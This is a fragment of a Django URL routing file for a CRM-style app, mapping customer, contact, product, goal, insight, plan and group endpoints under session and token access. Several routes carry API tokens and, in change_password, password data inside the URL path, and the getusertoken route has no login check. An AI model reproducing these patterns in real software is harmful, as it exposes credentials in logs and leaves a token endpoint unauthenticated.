re_path(r'^(?P<workspace>\d+)/getActions/(?P<account>.*)$', login_required(actionsapi.getActions, login_url='/webapp/login/'), name=u"apigetactions"),
re_path(r'^(?P<workspace>\d+)/createAction/(?P<task>.*)$', login_required(actionsapi.createAction), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/setaction/(?P<task>.*)$', login_required(actionsapi.setTask), name=u"saveCustData"),
re_path(r'^(?P<workspace>\d+)/deleteAction/(?P<task>.*)$', login_required(actionsapi.dropTask, login_url='/webapp/login/'), name=u"apidroptask"),
re_path(r'^(?P<workspace>\d+)/modifyAction/(?P<action>.*)$', login_required(actionsapi.modifyAction), name=u"apicreateplan"),
# Plans
re_path(r'^(?P<workspace>\d+)/getplans$', login_required(actionsapi.getPlans), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/getplans/(?P<account>.*)$', login_required(actionsapi.getPlans), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/get_plans$', login_required(actionsapi.get_plans), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/get_plans/(?P<account>.*)$', login_required(actionsapi.get_plans), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/setplan/(?P<plan>.*)$', login_required(actionsapi.setPlan), name=u"apicreateplan"),
re_path(r'^(?P<workspace>\d+)/createPlan/(?P<plan>.*)$', login_required(actionsapi.setPlan), name=u"apicreateplan"),
re_path(r'^(?P<workspace>\d+)/modifyPlan/(?P<plan>.*)$', login_required(actionsapi.modifyPlan), name=u"apicreateplan"),
re_path(r'^(?P<workspace>\d+)/deletePlan/(?P<planid>\d+)$', login_required(actionsapi.dropPlan), name=u"apidropplan"),
# Plans and Actions
re_path(r'^(?P<workspace>\d+)/plansToActions$', login_required(actionsapi.plansToActions), name=u"apigetplansperaciton"),
re_path(r'^(?P<workspace>\d+)/getPlansPerAction$', login_required(actionsapi.getPlansGroupedByAction), name=u"apigetplansperaciton"),
re_path(r'^(?P<workspace>\d+)/getPlansPerAction/(?P<account>.*)$', login_required(actionsapi.getPlansGroupedByAction), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/getActionsPerPlan$', login_required(actionsapi.getActionsGroupedByPlan), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/getActionsPerPlan/(?P<account>.*)$', login_required(actionsapi.getActionsGroupedByPlan), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/linkPlanToAction/(?P<lk>.*)$', login_required(actionsapi.linkPlanToAction), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/unlinkPlanFromAction/(?P<lk>.*)$', login_required(actionsapi.unlinkPlanFromAction), name=u"apigetplans"),
# Users
re_path(r'^(?P<workspace>\d+)/getuserprofile$', login_required(usersapi.getUserProfile, login_url='/webapp/login/'), name=u"getuserprofile"),
re_path(r'^(?P<workspace>\d+)/getusertoken$', usersapi.getUserToken, name=u"getusertoken"),
re_path(r'^(?P<workspace>\d+)/setContactInfo/(?P<info>.*)$', login_required(usersapi.setUserContactInfo, login_url='/webapp/login/'), name=u"setcontactinfo"),
re_path(r'^(?P<workspace>\d+)/setactivityinfo/(?P<info>\w+)$', login_required(usersapi.setUserContactInfo, login_url='/webapp/login/'), name=u"setactivityinfo"),
re_path(r'^(?P<workspace>\d+)/setconfiginfo/(?P<language>\w+)$', login_required(usersapi.setUserConfigInfo, login_url='/webapp/login/'), name=u"setconfiginfo"),
# Groups
re_path(r'^(?P<workspace>\d+)/getGroups$', login_required(groupsapi.getGroups), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/getGroups/(?P<user_id>[-\w\ ]+)$', login_required(groupsapi.getGroups), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/createGroup/(?P<group>.*)$', login_required(groupsapi.createGroup), name=u"apicreateplan"),
re_path(r'^(?P<workspace>\d+)/modifyGroup/(?P<group>.*)$', login_required(groupsapi.modifyGroup), name=u"apicreateplan"),
re_path(r'^(?P<workspace>\d+)/deleteGroup/(?P<group_id>\d+)$', login_required(groupsapi.deleteGroup), name=u"apidropplan"),
# Groups and Users
re_path(r'^(?P<workspace>\d+)/getUsersPerGroup$', login_required(groupsapi.getUsersPerGroup), name=u"apigetplansperaciton"),
re_path(r'^(?P<workspace>\d+)/getUsersPerGroup/(?P<user_name>[-\w\ ]+)$', login_required(groupsapi.getUsersPerGroup), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/getGroupsPerUser$', login_required(groupsapi.getGroupsPerUser), name=u"apigetplansperaciton"),
re_path(r'^(?P<workspace>\d+)/getGroupsPerUser/(?P<user_name>[-\w\ ]+)$', login_required(groupsapi.getGroupsPerUser), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/addUserToGroup/(?P<lk>.*)$', login_required(groupsapi.addUserToGroup), name=u"apigetplans"),
re_path(r'^(?P<workspace>\d+)/removeUserFromGroup/(?P<lk>.*)$', login_required(groupsapi.removeUserFromGroup), name=u"apigetplans"),
# Maps
re_path(r'^(?P<workspace>\d+)/maps/getCustomers$', login_required(mapsapi.getCustomers), name=u"setconfiginfo"),
re_path(r'^(?P<workspace>\d+)/maps/getAllocation/(?P<details>.*)', login_required(mapsapi.getAllocation), name=u"setconfiginfo"),
# --- Token access ---
# Customers
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getdata$', token_required(customersapi.getCustomersData), name=u"apidata"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getdata/(?P<account>.*)$', token_required(customersapi.getCustomersData), name=u"apidata"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getcustomers$', token_required(customersapi.getCustomers), name=u"apigetcustomers"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getcustomers/(?P<account>.*)$', token_required(customersapi.getCustomers), name=u"apigetcustomers"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/get_customers$', token_required(customersapi.get_customers), name=u"apigetcustomers"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/get_customers/(?P<account>.*)$', token_required(customersapi.get_customers), name=u"apigetcustomers"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/get_group_customers$', token_required(customersapi.get_group_customers), name=u"apigetgroupcustomers"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getcustomerslist$', token_required(customersapi.getCustomersList), name=u"apigetcustomerslist"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/insertCustomer/(?P<data>.*)$', token_required(customersapi.insertCustomer), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/modifyCustomer/(?P<data>.*)$', token_required(customersapi.modifyCustomer), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/deleteCustomer/(?P<data>.*)$', token_required(customersapi.deleteCustomer), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getlinkedcustomers/(?P<account>.*)$', token_required(customersapi.getlinkedcustomers), name=u"apigetlinkedcustomers"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getparentcustomers/(?P<account>.*)$', token_required(customersapi.getparentcustomers), name=u"apigetparentcustomers"),
# re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getparentcustomers/(?P<account>.*)$', token_required(customersapi.GetParentCustomers.as_view()), name=u"apigetparentcustomers"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getSalesPerCustomer/(?P<account>.*)$', token_required(customersapi.get_sales_per_customer), name=u"getSalesPerCustomerapi"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/addLinkedCustomer/(?P<account>.*)$', token_required(customersapi.add_linked_customer), name=u"addLinkedCustomer"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/removeLinkedCustomer/(?P<account>.*)$', token_required(customersapi.remove_linked_customer), name=u"removeLinkedCustomer"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getCustomerByProducts/(?P<account>.*)$', token_required(customersapi.customer_by_products), name=u"customerByProducts"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getCustomerByProductTypes/(?P<account>.*)$', token_required(customersapi.customer_by_product_types), name=u"getCustomerByProductTypes"),
# # Contacts
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getdata$', token_required(contactsapi.getContactsData), name=u"apidata"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getcontactslist$', token_required(contactsapi.getContactsList), name=u"apigetcustomerslist"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getcontactslist/(?P<account>.*)$', token_required(contactsapi.getContactsList), name=u"apigetcustomerslist"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getcontacts$', token_required(contactsapi.getContacts), name=u"apigetcustomers"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getcontactsByCustomer$', token_required(contactsapi.getContactsByCustomer), name=u"apigetcustomers"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getcontactsByCustomer/(?P<account>.*)$', token_required(contactsapi.getContactsByCustomer), name=u"apigetcustomers"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getcontacts/(?P<account>.*)$', token_required(contactsapi.getContacts), name=u"apigetcustomers"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/insertContact/(?P<data>.*)$', token_required(contactsapi.insertContact), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/modifyContact/(?P<data>.*)$', token_required(contactsapi.modifyContact), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/deleteContact/(?P<data>.*)$', token_required(contactsapi.deleteContact), name=u"saveCustData"),
# # Sales
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/insertSalesRecord/(?P<data>.*)$', token_required(salesapi.insertSalesRecord), name=u"saveCustData"),
# KAMs
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/createKam/(?P<data>.*)$', token_required(actionsapi.createKam), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/modifyKam/(?P<data>.*)$', token_required(actionsapi.modifyKam), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/mergeKams/(?P<data>.*)$', token_required(actionsapi.mergeKams), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/deleteKam/(?P<kamid>.*)$', token_required(actionsapi.deleteKam), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getKam$', token_required(actionsapi.getKam), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getKam/(?P<data>.*)$', token_required(actionsapi.getKam), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/linkKamToAction/(?P<lk>.*)$', token_required(actionsapi.linkKamToAction), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/unlinkKamFromAction/(?P<lk>.*)$', token_required(actionsapi.unlinkKamFromAction), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/linkKamToPlan/(?P<lk>.*)$', token_required(actionsapi.linkKamToPlan), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/unlinkKamFromPlan/(?P<lk>.*)$', token_required(actionsapi.unlinkKamFromPlan), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/linkKamToCustomer/(?P<lk>.*)$', token_required(actionsapi.linkKamToCustomer), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/unlinkKamFromCustomer/(?P<lk>.*)$', token_required(actionsapi.unlinkKamFromCustomer), name=u"apigetplans"),
# Xing
# re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getXingJobs$', token_required(xingapi.getXingJobs), name=u"saveCustData"),
# re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getXingUserProfile$', token_required(xingapi.getXingUserProfile), name=u"saveCustData"),
# Goals
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/createGoal/(?P<data>.*)$', token_required(goalsapi.createGoal), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/modifyGoal/(?P<data>.*)$', token_required(goalsapi.modifyGoal), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getGoals/(?P<data>.*)$', token_required(goalsapi.getGoals), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getGoals$', token_required(goalsapi.getGoals), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getGoalsByYear/(?P<data>.*)$', token_required(goalsapi.getGoalsByYear), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getGoalsByYear$', token_required(goalsapi.getGoalsByYear), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getGoalsPerQuarter/(?P<data>.*)$', token_required(goalsapi.getGoalsPerQuarter), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getGoalsPerQuarter$', token_required(goalsapi.getGoalsPerQuarter), name=u"saveCustData"),
# Performance
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getTotalPerformance$', token_required(goalsapi.getTotalPerformance), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getPerformance$', token_required(goalsapi.getPerformance), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getPerformanceKpi$', token_required(goalsapi.getPerformanceKpi), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getPerformanceCRM$', token_required(goalsapi.getPerformanceCRM), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/get_performance_crm$', token_required(goalsapi.get_performance_crm), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/get_performance_products$', token_required(goalsapi.get_performance_products), name=u"PerformanceProduct"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/performance_search/(?P<data>.*)$', token_required(goalsapi.performance_search), name=u"search"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/get_sales_year/$', token_required(goalsapi.get_sales_year), name=u"getSalesYear"),
# reports
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/insertReport/(?P<data>.*)$', token_required(goalsapi.insertReport), name=u"insertreport"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getReport/(?P<data>.*)$', token_required(goalsapi.getReport), name=u"getreport"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/modifyReport/(?P<data>.*)$', token_required(goalsapi.modifyReport), name=u"modifyreport"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/deleteReport/(?P<data>.*)$', token_required(goalsapi.dropReport), name=u"dropreport"),
# Data analysis
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/analyzeData$', token_required(dataanalysisapi.analyzeData), name=u"saveCustData"),
# Insights
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getallinsights$', token_required(insightsapi.getAllInsights), name=u"getinsights"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getallinsights/(?P<account>.*)$', token_required(insightsapi.getAllInsights), name=u"getinsights"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getinsights$', token_required(insightsapi.getInsights), name=u"getinsights"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getinsights/(?P<account>.*)$', token_required(insightsapi.getInsights), name=u"getinsights"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/get_insights$', token_required(insightsapi.get_insights), name=u"apidata"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/get_insights/(?P<account>.*)$', token_required(insightsapi.get_insights), name=u"apidata"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getCustomerRisk$', token_required(insightsapi.getCustomerRisk), name=u"apidata"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getCustomerRisk/(?P<account>[-\w ]+)$', token_required(insightsapi.getCustomerRisk), name=u"apidata"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getProductRisk$', token_required(insightsapi.getProductRisk), name=u"apidata"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getProductRisk/(?P<account>[-\w ]+)$', token_required(insightsapi.getProductRisk), name=u"apidata"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getProductTypeRisk$', token_required(insightsapi.getProductTypeRisk), name=u"apidata"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getProductTypeRisk/(?P<account>[-\w ]+)$', token_required(insightsapi.getProductTypeRisk), name=u"apidata"),
# Actions
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/setaction/(?P<task>.*)$', token_required(actionsapi.setTask), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/createAction/(?P<task>.*)$', token_required(actionsapi.createAction), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/deleteAction/(?P<task>.*)$', token_required(actionsapi.dropTask), name=u"apidroptask"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/modifyAction/(?P<action>.*)$', token_required(actionsapi.modifyAction), name=u"apicreateplan"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getactions$', token_required(actionsapi.getTasks), name=u"apigetactions"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getactions/(?P<account>.*)$', token_required(actionsapi.getTasks), name=u"apigetactions"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getActions$', token_required(actionsapi.getActions), name=u"apigetactions"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getActions/(?P<account>.*)$', token_required(actionsapi.getActions), name=u"apigetactions"),
# Plans
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/setplan/(?P<plan>.*)$', token_required(actionsapi.setPlan), name=u"apicreateplan"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/modifyPlan/(?P<plan>.*)$', token_required(actionsapi.modifyPlan), name=u"apicreateplan"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/deletePlan/(?P<planid>\d+)$', token_required(actionsapi.dropPlan), name=u"apidropplan"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getplans$', token_required(actionsapi.getPlans), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getplans/(?P<account>.*)$', token_required(actionsapi.getPlans), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/get_plans$', token_required(actionsapi.get_plans), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/get_plans/(?P<account>.*)$', token_required(actionsapi.get_plans), name=u"apigetplans"),
# Plans and Actions
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/plansToActions$', token_required(actionsapi.plansToActions), name=u"apigetplansperaciton"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getPlansPerAction$', token_required(actionsapi.getPlansGroupedByAction), name=u"apigetplansperaciton"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getPlansPerAction/(?P<account>.*)$', token_required(actionsapi.getPlansGroupedByAction), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getActionsPerPlan$', token_required(actionsapi.getActionsGroupedByPlan), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getActionsPerPlan/(?P<account>.*)$', token_required(actionsapi.getActionsGroupedByPlan), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/linkPlanToAction/(?P<lk>.*)$', token_required(actionsapi.linkPlanToAction), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/unlinkPlanFromAction/(?P<lk>.*)$', token_required(actionsapi.unlinkPlanFromAction), name=u"apigetplans"),
# Users
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getuserprofile$', token_required(usersapi.getUserProfile), name=u"getuserprofile"),
re_path(r'^(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getuserprofile$', token_required(usersapi.getUserProfile), name=u"getuserprofile"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/setContactInfo/(?P<info>.*)$', token_required(usersapi.setUserContactInfo), name=u"setcontactinfo"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/setactivityinfo/(?P<lastUpload>\w+)/(?P<lastFileUploaded>\w+)$', token_required(usersapi.setUserContactInfo), name=u"setactivityinfo"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/setconfiginfo/(?P<language>\w+)$', token_required(usersapi.setUserConfigInfo), name=u"setconfiginfo"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/setavatarimages$', token_required(usersapi.setavatarImages), name=u"setavatarimages"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/change_password/(?P<password_info>.*)$', token_required(usersapi.change_password), name=u"change_password"),
# Groups
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getGroups$', token_required(groupsapi.getGroups), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getGroups/(?P<user_id>[-\w\ ]+)$', token_required(groupsapi.getGroups), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/createGroup/(?P<group>.*)$', token_required(groupsapi.createGroup), name=u"apicreateplan"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/modifyGroup/(?P<group>.*)$', token_required(groupsapi.modifyGroup), name=u"apicreateplan"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/deleteGroup/(?P<group_id>\d+)$', token_required(groupsapi.deleteGroup), name=u"apidropplan"),
# Groups and Users
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getUsersPerGroup$', token_required(groupsapi.getUsersPerGroup), name=u"apigetplansperaciton"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getUsersPerGroup/(?P<user_name>[-\w\ ]+)$', token_required(groupsapi.getUsersPerGroup), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getGroupsPerUser$', token_required(groupsapi.getGroupsPerUser), name=u"apigetplansperaciton"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getGroupsPerUser/(?P<user_name>[-\w\ ]+)$', token_required(groupsapi.getGroupsPerUser), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/addUserToGroup/(?P<lk>.*)$', token_required(groupsapi.addUserToGroup), name=u"apigetplans"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/removeUserFromGroup/(?P<lk>.*)$', token_required(groupsapi.removeUserFromGroup), name=u"apigetplans"),
# Maps
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/maps/getCustomersData$', token_required(mapsapi.getCustomers), name=u"setconfiginfo"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/maps/getAllocation/(?P<details>.*)', token_required(mapsapi.getAllocation), name=u"setconfiginfo"),
# Products
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/insertProduct/(?P<data>.*)$', token_required(productsapi.insertProduct), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/insertProductType/(?P<data>.*)$', token_required(productsapi.insertProductType), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/insertProductLine/(?P<data>.*)$', token_required(productsapi.insertProductLine), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/insertProductClass/(?P<data>.*)$', token_required(productsapi.insertProductClass), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/deleteProduct/(?P<product>.*)$', token_required(productsapi.deleteProduct), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/deleteProductType/(?P<product>.*)$', token_required(productsapi.deleteProductType), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getProducts$', token_required(productsapi.getProducts), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getProducts/(?P<product>.*)$', token_required(productsapi.getProducts), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getProductsBy$', token_required(productsapi.getProductsBy), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getProductsBy/(?P<groupby>.*)$', token_required(productsapi.getProductsBy), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getProductsByType/(?P<data>.*)$', token_required(productsapi.getProductsByType), name=u"product_by_type"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getProductsByCustomer/(?P<data>.*)$', token_required(productsapi.getProductsByCustomer), name=u"product_by_customer"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getMinMaxVal/(?P<data>.*)$', token_required(productsapi.getMinMaxVal), name=u"ge_tMin_Max_Val"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getProductsByCustomer/(?P<data>.*)$', token_required(productsapi.getProductsByCustomer), name=u"product_by_customer"),
